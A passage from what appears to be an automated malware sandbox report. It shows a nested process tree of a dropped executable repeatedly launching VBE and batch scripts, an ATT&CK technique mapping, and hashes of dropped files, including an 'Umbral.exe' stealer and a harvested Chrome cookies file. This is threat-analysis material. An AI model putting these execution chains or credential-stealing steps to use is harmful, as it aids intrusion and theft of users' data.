        "C:\WinRAR\UnZiper.exe"
        25⤵
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        21⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1904
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        22⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        23⤵
        
        PID:2520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:5036
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        24⤵
        Executes dropped EXE
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        20⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3172
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        21⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        22⤵
        
        PID:2828
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        23⤵
        Executes dropped EXE
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        19⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4472
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        20⤵
        
        PID:1956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        21⤵
        
        PID:3848
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        22⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        18⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4456
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        19⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        20⤵
        
        PID:5036
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        21⤵
        Executes dropped EXE
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        17⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3020
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        18⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        19⤵
        
        PID:2076
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        20⤵
        Executes dropped EXE
        
        PID:3184
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        16⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2684
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        17⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        18⤵
        
        PID:2936
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        19⤵
        Executes dropped EXE
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        15⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1608
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        16⤵
        
        PID:876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        17⤵
        
        PID:3780
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        18⤵
        Executes dropped EXE
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        14⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1488
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        15⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        16⤵
        
        PID:5016
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        17⤵
        Executes dropped EXE
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3900
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        14⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        15⤵
        
        PID:4740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:4248
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        16⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        12⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:240
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        13⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        14⤵
        
        PID:3620
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        15⤵
        Executes dropped EXE
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        11⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1840
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        12⤵
        
        PID:720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        13⤵
        
        PID:1548
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        14⤵
        Executes dropped EXE
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        10⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4748
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        11⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        12⤵
        
        PID:1740
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        13⤵
        Executes dropped EXE
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:572
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        10⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        11⤵
        
        PID:1328
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        12⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3280
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        9⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        10⤵
        
        PID:232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:3584
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        11⤵
        Executes dropped EXE
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3552
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        8⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        9⤵
        
        PID:4060
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        10⤵
        Executes dropped EXE
        
        PID:2636
      - C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1904
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        7⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        8⤵
        
        PID:4352
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        9⤵
        Executes dropped EXE
        
        PID:1972
    - - C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:720
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        6⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        7⤵
        
        PID:3920
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        8⤵
        Executes dropped EXE
        
        PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
      "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:1548
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        5⤵
        
        PID:3252
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        6⤵
        
        PID:4060
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        7⤵
        Executes dropped EXE
        
        PID:1776
- - C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
    "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3620
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        5⤵
        
        PID:4720
      - C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        6⤵
        Executes dropped EXE
        
        PID:2548
- C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
  "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        5⤵
        Executes dropped EXE
        
        PID:2216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Alpha.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
b51beb4423c86427f672916554030c47

SHA1
9b97736d8434b62ef627a4ee8484e26c719924a8

SHA256
df796564c34fb36085aa25452d44ead56fba39aa18e80cb4ba1c30becca0dfea

SHA512
262fc9e9cddee9ae3c733bb961f44f27628783961db101aabc868765ba0e2aafdcb8f9b689f1abd4613836ed9cf3064e92cbd10495c83fe04dd2a496db3485d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UnZiper.exe.log

Filesize
1KB

MD5
ba188ab8514b037519a2ada3cdeb9a05

SHA1
518b6ee233a773b20230ebc226d741961b9bfdb1

SHA256
25effb7a46427c841cf727d6445ed5d8bcd128fdf767080ec1e10dbc8a40bee7

SHA512
fa2ea4f92834e14c5e09ff81c286c1ae7da9de68748a4dcc68da1ee214632386a24b204f4bd6ea71f17ec30d1e0fe8cb456c0c95ee65a07b87c2bef89c6bff08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5ba388a6597d5e09191c2c88d2fdf598

SHA1
13516f8ec5a99298f6952438055c39330feae5d8

SHA256
e6b6223094e8fc598ad12b3849e49f03a141ccd21e0eaa336f81791ad8443eca

SHA512
ead2a2b5a1c2fad70c1cf570b2c9bfcb7364dd9f257a834eb819e55b8fee78e3f191f93044f07d51c259ca77a90ee8530f9204cbae080fba1d5705e1209f5b19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dc83b981e902f57cdffc146a99ec272

SHA1
f013139764b9b729efcf921a86c620025134427a

SHA256
ab51087df5b4ff5f5d6cf85bad84d37725901f95cb2477009cb53e16ad56a6dc

SHA512
d3bb745f89bcd7a0d4babbe41f8cc3c5c21983e8b930737527c4e7fbd20bc4819b1c24baeff71e3073bd499676a29381f1c2f6f61bc1455bc24a2ee9e7f8a3cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8988d7b98b78cb4d250212ffb316870f

SHA1
a7a172d547763334331ee66893496d0c236f78f7

SHA256
0c87ad3ad718e16f81d9717cedf1e60402c9cf3da5914f5829ca96899c920c2e

SHA512
77c5b2cc28da14ec88c978eb649d0b4445cbafd34eabf51f0d1058521d99d80e9623115ca336ec8ba2cc53be110ceb64119ece9725d02b45169ccd02fc29b126

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
43b2acc13ba1fe53d4f8859fe4f98cfd

SHA1
d917f316b17b600053802c3133dae8c2466a7f41

SHA256
b6630b73e4df2c36854f9480fe321ceb44fe45103d74a509c6d616c120509186

SHA512
8851c9fb935dfa61345903ec7ec859779a98c0fd40bd5ad8f2a103f68b59ee3e7527664cb44fb0b3b17fd21977ed554e9b0aca0b1c8fec8d51b565a29d48d5e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94a732ad9567c7722677b704f161bbf6

SHA1
212811ca05d8204819237cea165696f65efa8eac

SHA256
b9dc77e8a7439340f20e97d6db885b5bc2c3cecf615c54c94a9edbafba4c8bc9

SHA512
cde8da9dc21c44b25805a09d9c2039e3b6e9bd269007c0214db0c9209a55dbea148e7b66107b503f1a6248a5d305e4c991806f9851ef999ff8cc09d1f10783a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b68ab4ca7e39baffff644d4820c98f0c

SHA1
25aee3c71f29c4520c9a89a13ce47864b75ced4e

SHA256
974a01642047984dcc7429b685decc35b22bfb88926f25174f77721f4afaf676

SHA512
5c96c46ba870ced22f9956ecec737fe2a6d4d73a52a1db323b29a82324f3fbd298ecb0a79ce55828bcb9e813b64815bae137d480f26e9d69f6cf7830dfd4ab9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6490e5c0581c173062323b1c20cfd9ff

SHA1
1652893659f99b780fd9733243637eb7795f5212

SHA256
a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79

SHA512
fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4890fe6ec28876dac3a781216ba2cd5

SHA1
ca24f7646b0971db264c96668fd8722514fc13a6

SHA256
b0ea5c1db4aa4f3f92cd5ffe93f148c1f7e32d27928d999acb154a39bc01761b

SHA512
0f91fc171b416a8091cc9a212b36ae4f3639abedac05197efc960e6667f52ad9deee41537192876b8dc7adafac66957940e1df8403b50cb2191eb6305f3efb5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
979db644c2cade95abc261f491bf3b6c

SHA1
251e5cde0a34f14694f95c681dc7cfe63bd60844

SHA256
3781dd13cdbb9b2639aafb7e49da7e37ef6e3bb03151240764819a46b7a13cb9

SHA512
7114c56e51c5212d951093d72c98ef7a31055693b1de7b1709347c4af27ed5eadf758e1b0d0faafdbf54252da2ddba571118d9f11dd9bf480bd7fe17e71c5464

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1e7c4a79ee5067246c7726badc18119a

SHA1
e1e45de63b94b8108854a31468a22d51201023b7

SHA256
69c018d98531dd3425f4ab9835730b823695d4bdf7b979b8025d21b420b102ad

SHA512
4231f26a723b98f9b4ee51c4effbceca314c7a232f4003639609f17693bd1c27b767e6a8c213d0fa40fb8a96322383741c9adae3f874fddc20e3e4c10b761b15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2oB6ZkUB4pQVhpW

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Temp\9dW7AyxtyIiid6R\Display\Display.png

Filesize
1.1MB

MD5
fe58268ca94bb66608529e0c235b1959

SHA1
39fcb62e6ced90aba269508cf5cfd3257aaee09d

SHA256
2419624520af7d73ee04b212e372f294c99aaaea67bc7afe503e127144537d42

SHA512
a6b6b36fb99bba0f0170e8265aa2cbad5fc768d3c16cd8a197a28863a8ba884192307c6ec41979ffa7be1923362d0b804fa3bd54389d83d34c978d6b1dfc71de

Download Submit
C:\Users\Admin\AppData\Local\Temp\EurjZqNjtGGi0xD

Filesize
20KB

MD5
f9c0afa43856e39c87893c893f60296f

SHA1
871bfef3cc47c3f12a4ca23d6a8902c7224eebe4

SHA256
7a180603eef3c4e7db93a8ea0d5b234bdf4172fa200c52ee5c4e36da027b0265

SHA512
633a33b62c64bf1ee8505df9c243e6f1ca858a758c6f5c51646d6a42a7238dc06f1cda8259b835b74d9695477de246082d5339bd9fa973925ddb9111964346a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\EurjZqNjtGGi0xD

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\PVNWnjeD2jCzh9i

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
231KB

MD5
5b57c2fc989cac662bfb47a701607c41

SHA1
8f079e17ac8ff6de547da26b1f4673220551d039

SHA256
9ec87e65f1973fe732713bfdccdab7a5e3b8e4ef99f87e05fe20a692d4af0bdd

SHA512
d83bc196a38f6858aae02a69e4436e3109723b9e2323085c0cbee418e5e7e966500fc97ec8e56b37f7a3a2574db2c41992f16ef55afecc5559a655b1e6fe9a00

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktxzol5j.ovx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe

Filesize
2.1MB

MD5
3c9a4df5825cffb82efd28341210cb5e

SHA1
fb5c0017c470dfa2c068830c88e5aaf01fcf28c4

SHA256
9bc59f729ffb4de1824b287b63044ec1f9a5b6d28e19ce4640f848fbd8738869

SHA512
45b7af20b970c6546ff542a828918a0737003b2f8cdde38d7e95736e5b22ce89bd0535ffd46c634a02e8763415a36f75e037065e999a20d3d175df8f7c848d3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\sfaiUCPBJJbdWJd\Browsers\Cookies\Chrome Cookies.txt

Filesize
224B

MD5
76ce9aa58e991863d46e8e4d4d682a2b

SHA1
17d3f1858f16907ce4cde0a56c622402d40b01b9

SHA256
b9adba746751598aa58ad2307fc3f968098716244135a98518a681f7b861f65e

SHA512
fc8a773cfc834d67711ebbb1e6430ecf0e79d1622a53f78ba702a61ea429fca03f19fbc7ebc31105dda8c28f32747f7a55ad4df4ef8ce9f9940442995a7e21b1

Download Submit
C:\WinRAR\UnZiper.exe

Filesize
1.8MB

MD5
a6d40fd838bb5e01cf15ecd8865b3716

SHA1
d3ac362700cbc6c4732a68df61089acb69029348

SHA256
5c50417c2c36617ee7e888a1a4dc02977fddcca617d84c2e5dbd1f172fd32870

SHA512
3d3b9734a8a78104742af23261c2caabb309ff3f7d237946182f7a07b8f5275a289191da6d19f0883ef7c499f098887e23b3dd06c0ccbeada8e1f721a7e65a59

Download Submit
C:\WinRAR\gn4kMFDzyxtNMy.vbe

Filesize
192B

MD5
3d8415c7e490301c4e6cad33a74cfe18

SHA1
703c9beb239ec68622a7691e3c4c1d3346cc12bd

SHA256
d6058a9013556315506dd79d4fa4339b80b40cd0e6c3a781adabfbfad3548c2e

SHA512
946c6ea4cb62829e964c0ef7601d6ec753e5d7c63d1c000a761c8e60fbff54882072640e86dc8faa905c9e684b04da067480430e90b59b6654f93b7c17367070

Download Submit
C:\WinRAR\t57a9grPX.bat

Filesize
23B

MD5
cbad1e030a37190ced948f45d7582691

SHA1
b1590dc4a67cd1b56b6b0ff42d48325de7bb8ea5

SHA256
8d910a7da0bc8d3baf495648cc0fef5391e8d7486cfc027827d3828a488f7571

SHA512
